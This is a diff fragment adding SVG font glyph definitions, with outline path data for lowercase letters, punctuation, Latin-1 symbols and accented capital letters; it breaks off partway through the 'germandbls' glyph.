+<glyph unicode="e" glyph-name="e" horiz-adv-x="587" d="M300 -10Q243 -10 196 11T113 70T59 157T39 262Q39 317 58 365T112 450T195 508T299 530Q356 530 403 509T485 450T538 365T557 263Q557 255 557 247T556 236H110Q113 194 129 159T172 97T231 57T303 42Q328
+42 353 49T399 68T437 97T463 136L522 120Q510 91 488 68T437 27T373 0T300 -10ZM492 288Q489 330 473 364T431 424T372 463T300 477Q262 477 228 463T169 424T128 364T109 288H492Z" />
+<glyph unicode="f" glyph-name="f" horiz-adv-x="330" d="M100 0V467H28V521H100V535Q100 631 141 685T253 740Q284 740 313 731T363 707L342 658Q328 669 308 675T266 681Q218 681 193 644T168 537V521H312V467H168V0H100Z" />
+<glyph unicode="g" glyph-name="g" horiz-adv-x="618" d="M284 -7Q230 -7 186 15T109 75T58 160T40 259Q40 313 57 362T107 449T183 508T282 530Q349 530 398 497T482 412V521H543V-2Q543 -56 523 -97T468 -167T387 -209T288 -223Q198 -223 143 -191T54 -105L96
+-72Q127 -122 178 -145T288 -169Q326 -169 360 -159T419 -128T460 -76T475 -2V101Q445 51 393 22T284 -7ZM303 50Q333 50 362 61T414 90T454 132T475 179V340Q464 368 445 392T402 433T351 460T295 470Q251 470 217 452T158 403T122 335T109 258Q109 216 124 178T165
+112T227 67T303 50Z" />
+<glyph unicode="h" glyph-name="h" horiz-adv-x="583" d="M513 0H445V291Q445 380 415 424T325 468Q296 468 268 457T214 425T171 378T143 319V0H75V730H143V403Q174 462 229 496T348 530Q393 530 424 514T475 468T504 397T513 305V0Z" />
+<glyph unicode="i" glyph-name="i" horiz-adv-x="218" d="M75 0V521H143V0H75ZM75 630V730H143V630H75Z" />
+<glyph unicode="j" glyph-name="j" horiz-adv-x="225" d="M-3 -181Q-36 -181 -65 -172T-117 -142L-84 -96Q-68 -110 -49 -115T-11 -120Q7 -120 23 -113T53 -94T74 -64T82 -27V521H150V-23Q150 -58 137 -87T103 -137T54 -169T-3 -181ZM82 630V730H150V630H82Z" />
+<glyph unicode="k" glyph-name="k" horiz-adv-x="530" d="M447 0L255 267L143 163V0H75V730H143V234L436 520H513L300 307L521 0H447Z" />
+<glyph unicode="l" glyph-name="l" horiz-adv-x="272" d="M78 730H146V118Q146 89 162 73T207 56Q218 56 233 59T261 67L273 12Q254 4 227 -1T179 -6Q132 -6 105 20T78 95V730Z" />
+<glyph unicode="m" glyph-name="m" horiz-adv-x="919" d="M850 0H782V291Q782 382 753 425T667 468Q637 468 611 457T562 426T522 379T496 318V0H428V291Q428 384 400 426T314 468Q255 468 209 427T143 319V0H75V521H137V403Q169 463 221 496T336 530Q402 530
+441 493T490 396Q563 530 691 530Q735 530 765 514T814 469T841 398T850 305V0Z" />
+<glyph unicode="n" glyph-name="n" horiz-adv-x="583" d="M513 0H445V291Q445 384 418 426T333 468Q303 468 273 457T218 426T172 379T143 319V0H75V521H137V403Q169 460 228 495T358 530Q401 530 431 514T479 469T505 398T513 305V0Z" />
+<glyph unicode="o" glyph-name="o" horiz-adv-x="595" d="M297 -10Q240 -10 193 11T112 70T58 156T39 259Q39 314 58 363T112 449T194 508T297 530Q353 530 400 508T482 449T536 363T556 259Q556 205 537 156T484 70T402 12T297 -10ZM108 258Q108 214 123 177T163
+111T223 66T297 50Q336 50 370 66T431 111T472 178T487 260Q487 303 472 341T431 408T371 453T297 470Q258 470 224 454T164 408T123 341T108 258Z" />
+<glyph unicode="p" glyph-name="p" horiz-adv-x="617" d="M341 -10Q275 -10 225 23T143 108V-213H75V521H136V420Q168 469 219 499T330 530Q384 530 429 508T507 448T558 361T577 260Q577 205 560 156T512 70T437 12T341 -10ZM322 50Q364 50 398 68T457 115T495
+182T508 260Q508 302 493 340T452 407T391 453T314 470Q288 470 260 460T207 432T165 391T143 341V181Q155 153 173 129T215 88T266 60T322 50Z" />
+<glyph unicode="q" glyph-name="q" horiz-adv-x="617" d="M276 -10Q223 -10 180 12T105 72T57 158T40 260Q40 314 59 363T111 449T190 508T288 530Q318 530 346 522T400 499T445 464T481 419V521H542V-122Q542 -150 567 -151V-210Q557 -212 548 -212T529 -212Q506
+-210 490 -193T474 -151V108Q436 50 386 20T276 -10ZM297 50Q327 50 353 60T402 86T443 125T474 173V334Q470 361 453 385T412 429T358 459T301 470Q259 470 224 452T163 405T123 337T109 259Q109 217 123 179T162 113T221 67T297 50Z" />
+<glyph unicode="r" glyph-name="r" horiz-adv-x="351" d="M335 461Q266 459 215 423T143 324V0H75V521H139V396Q168 456 217 490T322 524Q330 524 335 523V461Z" />
+<glyph unicode="s" glyph-name="s" horiz-adv-x="487" d="M248 -10Q187 -10 129 10T29 68L60 114Q104 78 149 60T247 42Q310 42 347 67T385 140Q385 162 375 176T346 202T297 221T228 239Q183 250 150 261T96 286T64 320T53 372Q53 411 68 441T110 490T172 520T248
+530Q308 530 357 511T436 459L403 419Q374 449 333 464T246 479Q219 479 196 474T156 456T128 426T118 382Q118 361 125 348T148 326T188 309T248 293Q298 281 336 269T399 241T438 202T451 146Q451 74 396 32T248 -10Z" />
+<glyph unicode="t" glyph-name="t" horiz-adv-x="335" d="M325 25Q319 22 308 17T281 7T247 -2T207 -6Q185 -6 165 0T130 18T106 50T97 94V467H25V521H97V697H165V521H285V467H165V113Q167 84 185 71T228 57Q257 57 279 66T307 80L325 25Z" />
+<glyph unicode="u" glyph-name="u" horiz-adv-x="594" d="M238 -10Q153 -10 112 46T70 215V521H138V227Q138 50 259 50Q289 50 318 60T371 89T415 134T447 193V521H515V88Q515 60 539 60V0Q527 -2 520 -2T509 -2Q485 -1 470 15T455 58V118Q421 57 363 24T238 -10Z" />
+<glyph unicode="v" glyph-name="v" horiz-adv-x="533" d="M231 0L19 521H89L268 63L448 521H514L302 0H231Z" />
+<glyph unicode="w" glyph-name="w" horiz-adv-x="813" d="M731 521H798L574 0H518L406 266L295 0H239L15 521H81L271 70L370 308L281 520H338L406 350L474 520H532L443 308L542 70L731 521Z" />
+<glyph unicode="x" glyph-name="x" horiz-adv-x="504" d="M88 521L244 317L252 302L260 317L416 521H489L290 259L489 0H416L260 203L252 217L244 203L88 0H15L214 259L15 521H88Z" />
+<glyph unicode="y" glyph-name="y" horiz-adv-x="542" d="M105 -160Q113 -161 120 -161T135 -162Q153 -162 163 -157T184 -135T206 -86T242 0L15 521H85L278 63L457 521H522L252 -151Q241 -180 216 -201T146 -223Q136 -223 127 -223T105 -220V-160Z" />
+<glyph unicode="z" glyph-name="z" horiz-adv-x="492" d="M31 46L383 470H39V521H457V475L106 51H456V0H31V46Z" />
+<glyph unicode="{" glyph-name="braceleft" horiz-adv-x="259" d="M154 683V422Q154 410 149 392T127 360Q143 346 148 328T154 298V26H209V-31H115Q107 -31 100 -25T92 -1V280Q92 300 82 316T53 335V387Q63 387 70 393T83 407T90 424T92 440V710Q92 729 101 734T115
+740H209V683H154Z" />
+<glyph unicode="|" glyph-name="bar" horiz-adv-x="231" d="M86 -130V775H145V-130H86Z" />
+<glyph unicode="}" glyph-name="braceright" horiz-adv-x="259" d="M50 683V740H144Q149 740 158 735T167 710V440Q167 434 169 425T175 407T187 393T205 387V335Q186 333 177 317T167 280V-1Q167 -18 160 -24T144 -31H50V26H105V298Q105 309 110 327T131 360Q115
+374 110 392T105 422V683H50Z" />
+<glyph unicode="~" glyph-name="asciitilde" horiz-adv-x="511" d="M66 241Q66 246 72 262T90 297T123 329T174 344Q197 344 217 335T256 315T294 295T334 286Q353 286 366 293T387 310T399 327T403 338H446Q446 336 441 321T422 288T387 256T333 241Q308 241
+287 250T247 270T209 290T173 299Q155 299 143 290T124 271T113 251T109 241H66V241Z" />
+<glyph unicode="&#xa0;" glyph-name="uni00A0" horiz-adv-x="255" />
+<glyph unicode="&#xa1;" glyph-name="exclamdown" horiz-adv-x="251" d="M159 487V-2H91V487H159ZM159 715V603H91V715H159Z" />
+<glyph unicode="&#xa2;" glyph-name="cent" horiz-adv-x="561" d="M276 -120V-9Q225 -5 182 19T109 81T61 164T43 258Q43 309 59 355T106 439T179 500T276 529V645H313V529Q388 527 438 495T516 406L451 385Q428 426 392 446T313 468V51Q332 52 355 59T398 77T434
+104T455 139L522 119Q510 87 486 63T433 22T372 -2T313 -10V-120H276ZM113 258Q113 221 125 187T159 125T211 79T276 54V466Q237 462 207 443T156 395T124 330T113 258Z" />
+<glyph unicode="&#xa3;" glyph-name="sterling" horiz-adv-x="499" d="M52 372H146Q135 393 123 413T101 455T85 498T78 544Q78 580 92 611T131 665T188 701T259 715Q313 715 361 687T440 610L400 568Q376 610 338 634T257 658Q233 658 212 649T175 624T150 587T141
+540Q141 518 148 498T165 457T187 416T210 372H388V318H230Q238 288 238 258Q238 208 215 162T135 54Q171 63 208 63Q229 63 247 60T282 54T315 48T350 45Q370 45 391 49T439 63L456 11Q430 -2 402 -8T347 -15Q324 -15 304 -12T264 -4T224 5T180 9Q157 9 128 5T72
+-8L54 42Q88 76 112 104T150 158T171 206T178 254Q178 271 176 287T168 318H52V372Z" />
+<glyph unicode="&#xa4;" glyph-name="currency" horiz-adv-x="537" d="M156 480Q201 519 268 519Q301 519 329 509T381 480L451 551L485 518L413 446Q430 423 439 395T448 336Q448 306 439 278T412 226L485 154L455 125L381 194Q359 176 331 166T268 155Q234 155
+206 165T154 194L83 125L53 154L124 225Q88 275 88 336Q88 400 123 447L53 518L86 551L156 480ZM145 335Q145 308 154 284T181 242T220 214T268 203Q293 203 315 213T355 242T381 284T391 337Q391 365 382 389T355 432T316 460T268 470Q242 470 220 460T181 431T155
+388T145 335Z" />
+<glyph unicode="&#xa5;" glyph-name="yen" horiz-adv-x="676" d="M432 366H516V318H405L372 264V237H517V189H372V0H302V189H159V237H302V266L271 318H159V366H245L29 710H105L337 328L571 710H648L432 366Z" />
+<glyph unicode="&#xa6;" glyph-name="brokenbar" horiz-adv-x="234" d="M147 277V-130H87V277H147ZM147 775V368H87V775H147Z" />
+<glyph unicode="&#xa7;" glyph-name="section" horiz-adv-x="506" d="M417 195Q440 181 451 155T463 93Q463 45 444 11T395 -45T329 -77T258 -88Q225 -88 196 -80T143 -58T98 -29T62 3L107 45Q178 -23 255 -23Q281 -23 305 -16T349 5T381 41T393 90Q393 119 381
+136T349 162T308 174T267 179Q173 187 123 225T72 338Q72 368 79 390T98 427Q77 442 62 473T47 542Q47 581 63 612T107 667T171 702T249 715Q313 715 357 687T427 620L373 595Q365 611 351 622T320 640T285 650T249 653Q223 653 199 646T156 625T126 589T115 540Q115
+508 128 490T161 461T204 447T247 442Q282 439 317 431T382 406T429 361T447 289Q447 258 439 234T417 195ZM138 329Q138 284 162 265T221 237T292 227T353 215Q367 226 374 246T382 287Q382 316 370 334T338 364T295 380T249 386Q226 387 206 389T163 400Q152
+389 145 371T138 329Z" />
+<glyph unicode="&#xa8;" glyph-name="dieresis" horiz-adv-x="329" d="M61 633V727H119V633H61ZM210 633V727H268V633H210Z" />
+<glyph unicode="&#xa9;" glyph-name="copyright" horiz-adv-x="832" d="M415 -7Q336 -7 269 20T152 96T76 211T48 355Q48 432 75 498T152 612T268 687T415 715Q494 715 562 688T679 612T756 498T784 355Q784 277 756 211T679 97T562 21T415 -7ZM415 26Q485 26
+546 50T652 117T723 220T749 353Q749 424 724 484T654 588T548 657T415 682Q344 682 283 657T178 589T108 485T83 354Q83 284 108 224T177 120T282 51T415 26ZM423 123Q377 123 335 139T261 186T209 259T189 355Q189 397 203 439T245 514T316 568T417 589Q483 589
+534 561T609 478L543 457Q533 479 518 493T485 515T450 526T417 529Q377 529 348 514T299 474T269 418T259 355Q259 314 274 282T312 227T363 194T419 182Q457 182 495 202T550 258L616 239Q609 221 592 201T550 163T493 134T423 123Z" />
+<glyph unicode="&#xaa;" glyph-name="ordfeminine" horiz-adv-x="434" d="M166 346Q141 346 120 354T82 378T57 413T48 456Q48 480 59 500T90 534T137 557T197 565Q224 565 251 561T298 547V575Q298 618 273 643T203 668Q150 668 89 627L69 664Q139 710 208 710Q278
+710 318 674T358 569V426Q358 405 377 404V352Q368 351 362 351T349 350Q331 351 321 361T308 386L307 411Q282 379 245 363T166 346ZM182 391Q214 391 242 402T286 434Q298 446 298 460V512Q278 521 254 524T206 528Q160 528 132 510T104 460Q104 431 126 411T182
+391Z" />
+<glyph unicode="&#xab;" glyph-name="guillemotleft" horiz-adv-x="573" d="M41 276L289 454V395L96 259L289 125V66L41 239V276ZM261 276L510 454V395L317 259L510 125V66L261 239V276Z" />
+<glyph unicode="&#xac;" glyph-name="logicalnot" horiz-adv-x="582" d="M512 364V126H452V302H73V364H512Z" />
+<glyph unicode="&#xad;" glyph-name="uni00AD" horiz-adv-x="570" d="M65 241V304H504V241H65Z" />
+<glyph unicode="&#xae;" glyph-name="registered" horiz-adv-x="832" d="M416 -7Q336 -7 269 20T153 96T76 211T48 355Q48 432 75 498T152 612T269 687T416 715Q495 715 562 688T679 612T756 498T784 355Q784 277 756 211T679 97T563 21T416 -7ZM416 25Q486 25
+546 49T652 116T722 219T748 354Q748 424 723 484T654 588T549 657T416 682Q344 682 283 657T178 588T109 485T84 355Q84 284 109 224T178 120T283 50T416 25ZM263 580H454Q483 580 508 568T551 535T579 489T589 437Q589 388 561 350T486 302L597 127H539L433 295H316V127H263V580ZM454
+341Q495 341 516 368T537 437Q537 479 513 505T450 532H316V341H454Z" />
+<glyph unicode="&#xaf;" glyph-name="overscore" horiz-adv-x="396" d="M54 663V710H343V663H54Z" />
+<glyph unicode="&#xb0;" glyph-name="degree" horiz-adv-x="266" d="M50 642Q50 677 74 700T133 724Q168 724 192 701T216 642Q216 606 192 582T133 558Q98 558 74 582T50 642ZM102 672Q89 659 89 641Q89 623 102 610Q115 597 133 597Q152 597 165 610Q177 624
+177 641Q177 658 165 672Q153 685 133 685Q114 685 102 672Z" />
+<glyph unicode="&#xb1;" glyph-name="plusminus" horiz-adv-x="467" d="M72 61V118H395V61H72ZM395 393V336H265V196H202V336H72V393H202V533H265V393H395Z" />
+<glyph unicode="&#xb2;" glyph-name="twosuperior" horiz-adv-x="388" d="M36 407Q36 446 43 474T67 524T106 562T162 590Q185 599 209 607T253 627T286 654T299 693Q299 724 274 745T197 767Q172 767 152 762T116 748T89 730T70 712L40 743Q44 748 56 759T88
+782T137 802T203 811Q276 811 312 777T349 692Q349 661 335 640T299 603T254 579T208 563Q175 552 153 538T117 509T97 479T91 450H344V407H36Z" />
+<glyph unicode="&#xb3;" glyph-name="threesuperior" horiz-adv-x="390" d="M190 401Q127 401 85 425T35 490L62 519Q63 507 73 494T99 471T139 453T189 446Q238 446 272 465T306 517Q306 552 266 571T157 591H134V632H157Q220 632 256 648T292 698Q292 731 261
+750T186 770Q144 770 114 755T69 714L39 748Q57 777 97 794T186 811Q219 811 247 803T296 780T328 745T340 701Q340 632 249 613Q296 606 323 578T351 511Q351 485 338 465T303 430T252 409T190 401Z" />
+<glyph unicode="&#xb4;" glyph-name="acute" horiz-adv-x="222" d="M94 620L49 637L108 730H180L94 620Z" />
+<glyph unicode="&#xb5;" glyph-name="mu" horiz-adv-x="620" d="M82 521H150V227Q150 50 273 50Q303 50 331 60T384 89T428 134T460 193V521H528V88Q528 60 552 60V0Q540 -2 533 -2T519 -2Q496 0 482 16T468 52V118Q455 91 434 68T387 28T330 0T269 -10Q221 -10
+191 13T146 75V-212H82V521Z" />
+<glyph unicode="&#xb6;" glyph-name="paragraph" horiz-adv-x="602" d="M34 469Q34 583 108 646T316 710H557V656H487V-80H427V231H353V-80H294V231Q234 232 186 248T104 296T52 370T34 469ZM93 471Q93 424 109 390T152 334T216 299T294 285V656Q196 655 145 606T93
+471ZM427 656H353V285H427V656Z" />
+<glyph unicode="&#xb7;" glyph-name="middot" horiz-adv-x="189" d="M65 246V358H124V246H65Z" />
+<glyph unicode="&#xb8;" glyph-name="cedilla" horiz-adv-x="283" d="M39 -126Q53 -133 77 -138T127 -144Q184 -144 184 -109Q184 -89 171 -81T134 -73Q113 -73 90 -77T54 -87L111 18L144 5L109 -51Q118 -47 128 -46T147 -45Q182 -45 202 -60T223 -106Q223 -140
+197 -158T121 -176Q92 -176 67 -171T22 -157L39 -126Z" />
+<glyph unicode="&#xb9;" glyph-name="onesuperior" horiz-adv-x="272" d="M250 451V406H49V451H130V760Q125 754 114 746T90 730T61 717T34 711V756Q50 756 67 764T98 782T121 801T130 811H175V451H250Z" />
+<glyph unicode="&#xba;" glyph-name="ordmasculine" horiz-adv-x="449" d="M224 346Q184 346 151 361T94 401T57 459T44 528Q44 565 57 598T94 656T151 695T224 710Q264 710 297 696T354 656T391 598T405 528Q405 492 392 459T355 401T298 361T224 346ZM101 527Q101
+499 110 475T137 433T176 405T224 395Q249 395 271 405T311 434T337 476T347 529Q347 557 338 581T311 623T272 651T224 661Q199 661 177 651T138 622T111 580T101 527Z" />
+<glyph unicode="&#xbb;" glyph-name="guillemotright" horiz-adv-x="573" d="M532 239L284 66V125L477 259L284 395V454L532 276V239ZM312 239L63 66V125L256 259L63 395V454L312 276V239Z" />
+<glyph unicode="&#xbc;" glyph-name="onequarter" horiz-adv-x="825" d="M687 0V103H459V145L701 399H732V147H789V103H732V0H687ZM507 147H688V338L507 147ZM133 27L412 367L684 714L719 684L440 344L167 -4L133 27ZM260 371V326H59V371H140V680Q135 674 124
+666T100 650T71 637T44 631V676Q60 676 77 684T108 702T131 721T140 731H185V371H260Z" />
+<glyph unicode="&#xbd;" glyph-name="onehalf" horiz-adv-x="864" d="M516 0Q516 39 523 67T546 118T585 156T639 184Q661 193 684 201T727 220T759 247T772 286Q772 317 748 339T673 361Q649 361 629 356T594 342T568 323T549 305L520 337Q524 342 536 353T567
+375T615 395T679 404Q750 404 785 370T821 285Q821 254 807 233T773 197T729 174T685 158Q652 147 631 133T597 103T579 73T574 44H822V0H516ZM99 27L378 367L650 714L685 684L406 344L133 -4L99 27ZM261 371V326H60V371H141V680Q136 674 125 666T101 650T72 637T45
+631V676Q61 676 78 684T109 702T132 721T141 731H186V371H261Z" />
+<glyph unicode="&#xbe;" glyph-name="threequarters" horiz-adv-x="837" d="M197 321Q134 321 92 345T42 410L69 439Q70 427 80 414T106 391T146 373T196 366Q245 366 279 385T313 437Q313 472 273 491T164 511H141V552H164Q227 552 263 568T299 618Q299 651 268
+670T193 690Q151 690 121 675T76 634L46 668Q64 697 104 714T193 731Q226 731 254 723T303 700T335 665T347 621Q347 552 256 533Q303 526 330 498T358 431Q358 405 345 385T310 350T259 329T197 321ZM696 0V103H468V145L710 399H741V147H798V103H741V0H696ZM516
+147H697V338L516 147ZM166 27L445 367L717 714L752 684L473 344L200 -4L166 27Z" />
+<glyph unicode="&#xbf;" glyph-name="questiondown" horiz-adv-x="469" d="M318 304Q318 238 298 199T233 134Q213 122 189 110T144 79T109 36T94 -26Q94 -59 105 -83T136 -123T179 -148T230 -156Q284 -156 326 -127T391 -54L438 -84Q424 -115 402 -139T353 -179T294
+-204T229 -213Q192 -213 157 -202T95 -166T51 -106T34 -22Q34 18 45 45T76 93T119 127T169 156Q187 166 203 176T232 203T252 244T260 304H318ZM317 506V399H258V506H317Z" />
+<glyph unicode="&#xc0;" glyph-name="Agrave" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481ZM245 917H316L376 824L332 807L245 917Z" />
+<glyph unicode="&#xc1;" glyph-name="Aacute" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481ZM345 807L300 824L359 917H431L345 807Z" />
+<glyph unicode="&#xc2;" glyph-name="Acircumflex" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481ZM215 832L313 917H363L462 832L423 811L338 874L253 811L215 832Z" />
+<glyph unicode="&#xc3;" glyph-name="Atilde" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481ZM400 825Q377 825 361 831T330 844T302 858T272 865Q255 865 246 858T231 843T224 827T222 817H180Q180
+822 183 837T197 869T225 897T271 910Q292 910 307 904T337 889T365 875T399 868Q418 868 429 875T447 891T454 907T456 917H498Q498 912 494 897T480 866T450 838T400 825Z" />
+<glyph unicode="&#xc4;" glyph-name="Adieresis" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481ZM235 820V914H293V820H235ZM384 820V914H442V820H384Z" />
+<glyph unicode="&#xc5;" glyph-name="Aring" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481ZM264 852Q264 881 285 899T338 917Q370 917 391 899T412 852Q412 822 391 804T338 786Q306 786 285 804T264
+852ZM338 890Q321 890 310 880T298 852Q298 835 309 824T338 813Q354 813 366 824T379 852Q379 869 367 879T338 890Z" />
+<glyph unicode="&#xc6;" glyph-name="AE" horiz-adv-x="961" d="M431 710H912V648H518V393H858V331H518V62H921V0H450V222H191L50 0H-26L431 710ZM445 284V626L223 284H445Z" />
+<glyph unicode="&#xc7;" glyph-name="Ccedilla" horiz-adv-x="683" d="M294 -126Q308 -133 332 -138T382 -144Q439 -144 439 -109Q439 -89 426 -81T389 -73Q368 -73 345 -77T309 -87L353 -5Q284 -1 226 32T127 116T62 230T39 360Q39 424 61 487T127 601T233 682T376
+714Q471 714 538 671T638 559L583 525Q566 560 542 584T489 623T431 644T372 651Q308 651 259 625T177 557T126 463T109 356Q109 297 129 243T185 148T269 82T375 57Q405 57 436 64T497 88T552 129T594 189L652 159Q636 122 608 93T545 43T471 10T392 -5L364 -51Q373
+-47 383 -46T402 -45Q437 -45 457 -60T478 -106Q478 -140 452 -158T376 -176Q347 -176 322 -171T277 -157L294 -126Z" />
+<glyph unicode="&#xc8;" glyph-name="Egrave" horiz-adv-x="609" d="M566 62V0H89V710H557V648H159V392H506V333H159V62H566ZM244 917H315L375 824L331 807L244 917Z" />
+<glyph unicode="&#xc9;" glyph-name="Eacute" horiz-adv-x="609" d="M343 807L298 824L357 917H429L343 807ZM566 62V0H89V710H557V648H159V392H506V333H159V62H566Z" />
+<glyph unicode="&#xca;" glyph-name="Ecircumflex" horiz-adv-x="609" d="M214 832L312 917H362L461 832L422 811L337 874L252 811L214 832ZM566 62V0H89V710H557V648H159V392H506V333H159V62H566Z" />
+<glyph unicode="&#xcb;" glyph-name="Edieresis" horiz-adv-x="609" d="M233 820V914H291V820H233ZM382 820V914H440V820H382ZM566 62V0H89V710H557V648H159V392H506V333H159V62H566Z" />
+<glyph unicode="&#xcc;" glyph-name="Igrave" horiz-adv-x="248" d="M89 0V710H159V0H89ZM31 917H102L162 824L118 807L31 917Z" />
+<glyph unicode="&#xcd;" glyph-name="Iacute" horiz-adv-x="248" d="M89 0V710H159V0H89ZM130 807L85 824L144 917H216L130 807Z" />
+<glyph unicode="&#xce;" glyph-name="Icircumflex" horiz-adv-x="248" d="M89 0V710H159V0H89ZM1 832L99 917H149L248 832L209 811L124 874L39 811L1 832Z" />
+<glyph unicode="&#xcf;" glyph-name="Idieresis" horiz-adv-x="248" d="M89 0V710H159V0H89ZM20 820V914H78V820H20ZM169 820V914H227V820H169Z" />
+<glyph unicode="&#xd0;" glyph-name="Eth" horiz-adv-x="721" d="M95 0V330H34V384H95V710H336Q421 710 484 682T590 606T654 494T676 356Q676 275 652 210T584 98T477 26T336 0H95ZM606 356Q606 420 588 473T536 566T451 626T336 648H165V384H335V330H165V62H336Q402
+62 452 84T537 146T588 239T606 356Z" />
+<glyph unicode="&#xd1;" glyph-name="Ntilde" horiz-adv-x="772" d="M159 580V0H89V710H143L613 119V709H683V0H622L159 580ZM451 825Q428 825 412 831T381 844T353 858T323 865Q306 865 297 858T282 843T275 827T273 817H231Q231 822 234 837T248 869T276 897T322
+910Q343 910 358 904T388 889T416 875T450 868Q469 868 480 875T498 891T505 907T507 917H549Q549 912 545 897T531 866T501 838T451 825Z" />
+<glyph unicode="&#xd2;" glyph-name="Ograve" horiz-adv-x="751" d="M375 -5Q301 -5 240 25T134 106T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684 486T708 354Q708 283 683 218T613 104T507 25T375 -5ZM112 355Q112 297
+131 244T185 149T268 83T375 58Q435 58 484 84T567 152T619 247T638 355Q638 413 619 466T564 561T481 626T375 651Q315 651 266 626T183 558T131 463T112 355ZM283 917H354L414 824L370 807L283 917Z" />
+<glyph unicode="&#xd3;" glyph-name="Oacute" horiz-adv-x="751" d="M382 807L337 824L396 917H468L382 807ZM375 -5Q301 -5 240 25T134 106T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684 486T708 354Q708 283 683 218T613
+104T507 25T375 -5ZM112 355Q112 297 131 244T185 149T268 83T375 58Q435 58 484 84T567 152T619 247T638 355Q638 413 619 466T564 561T481 626T375 651Q315 651 266 626T183 558T131 463T112 355Z" />
+<glyph unicode="&#xd4;" glyph-name="Ocircumflex" horiz-adv-x="751" d="M253 832L351 917H401L500 832L461 811L376 874L291 811L253 832ZM375 -5Q301 -5 240 25T134 106T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684
+486T708 354Q708 283 683 218T613 104T507 25T375 -5ZM112 355Q112 297 131 244T185 149T268 83T375 58Q435 58 484 84T567 152T619 247T638 355Q638 413 619 466T564 561T481 626T375 651Q315 651 266 626T183 558T131 463T112 355Z" />
+<glyph unicode="&#xd5;" glyph-name="Otilde" horiz-adv-x="751" d="M375 -5Q301 -5 240 25T134 106T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684 486T708 354Q708 283 683 218T613 104T507 25T375 -5ZM112 355Q112 297
+131 244T185 149T268 83T375 58Q435 58 484 84T567 152T619 247T638 355Q638 413 619 466T564 561T481 626T375 651Q315 651 266 626T183 558T131 463T112 355ZM438 825Q415 825 399 831T368 844T340 858T310 865Q293 865 284 858T269 843T262 827T260 817H218Q218
+822 221 837T235 869T263 897T309 910Q330 910 345 904T375 889T403 875T437 868Q456 868 467 875T485 891T492 907T494 917H536Q536 912 532 897T518 866T488 838T438 825Z" />
+<glyph unicode="&#xd6;" glyph-name="Odieresis" horiz-adv-x="751" d="M273 820V914H331V820H273ZM422 820V914H480V820H422ZM375 -5Q301 -5 240 25T134 106T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684 486T708 354Q708
+283 683 218T613 104T507 25T375 -5ZM112 355Q112 297 131 244T185 149T268 83T375 58Q435 58 484 84T567 152T619 247T638 355Q638 413 619 466T564 561T481 626T375 651Q315 651 266 626T183 558T131 463T112 355Z" />
+<glyph unicode="&#xd7;" glyph-name="multiply" horiz-adv-x="457" d="M394 151L350 108L228 229L107 108L64 152L185 272L65 393L109 436L228 316L349 437L392 393L272 272L394 151Z" />
+<glyph unicode="&#xd8;" glyph-name="Oslash" horiz-adv-x="751" d="M650 710L593 625Q647 572 677 501T708 354Q708 283 683 218T613 104T507 25T375 -5Q327 -5 285 8T207 44L178 0H101L156 83Q102 135 72 206T42 355Q42 426 67 491T138 606T244 685T376 715Q424
+715 465 702T543 665L573 710H650ZM112 355Q112 293 133 237T193 139L507 611Q478 630 445 640T375 651Q315 651 266 626T183 558T131 463T112 355ZM638 355Q638 416 616 471T556 569L242 97Q301 58 375 58Q435 58 484 84T567 152T619 247T638 355Z" />
+<glyph unicode="&#xd9;" glyph-name="Ugrave" horiz-adv-x="755" d="M377 58Q444 58 488 83T559 150T596 245T607 352V710H677V352Q677 280 661 216T610 102T517 24T378 -5Q294 -5 237 25T144 106T94 220T79 352V710H148V352Q148 296 159 243T196 149T267 83T377
+58ZM285 917H356L416 824L372 807L285 917Z" />
+<glyph unicode="&#xda;" glyph-name="Uacute" horiz-adv-x="755" d="M385 807L340 824L399 917H471L385 807ZM377 58Q444 58 488 83T559 150T596 245T607 352V710H677V352Q677 280 661 216T610 102T517 24T378 -5Q294 -5 237 25T144 106T94 220T79 352V710H148V352Q148
+296 159 243T196 149T267 83T377 58Z" />
+<glyph unicode="&#xdb;" glyph-name="Ucircumflex" horiz-adv-x="755" d="M255 832L353 917H403L502 832L463 811L378 874L293 811L255 832ZM377 58Q444 58 488 83T559 150T596 245T607 352V710H677V352Q677 280 661 216T610 102T517 24T378 -5Q294 -5 237 25T144
+106T94 220T79 352V710H148V352Q148 296 159 243T196 149T267 83T377 58Z" />
+<glyph unicode="&#xdc;" glyph-name="Udieresis" horiz-adv-x="755" d="M275 820V914H333V820H275ZM424 820V914H482V820H424ZM377 58Q444 58 488 83T559 150T596 245T607 352V710H677V352Q677 280 661 216T610 102T517 24T378 -5Q294 -5 237 25T144 106T94 220T79
+352V710H148V352Q148 296 159 243T196 149T267 83T377 58Z" />
+<glyph unicode="&#xdd;" glyph-name="Yacute" horiz-adv-x="651" d="M93 710L325 328L559 710H635L360 264V0H290V266L16 710H93ZM331 807L286 824L345 917H417L331 807Z" />
+<glyph unicode="&#xde;" glyph-name="Thorn" horiz-adv-x="603" d="M364 569Q410 569 449 550T516 499T559 427T575 346Q575 302 561 262T519 190T455 140T371 121H159V0H89V710H159V569H364ZM368 184Q400 184 425 197T469 233T496 285T506 346Q506 378 495 407T464
+459T418 494T362 507H159V184H368Z" />
+<glyph unicode="&#xdf;" glyph-name="germandbls" horiz-adv-x="551" d="M238 57Q331 58 387 96T443 211Q443 246 431 275T397 324T344 356T276 368H257V430H275Q329 430 362 461T396 544Q396 571 386 591T360 626T321 647T273 654Q240 654 215 643T174 611T149
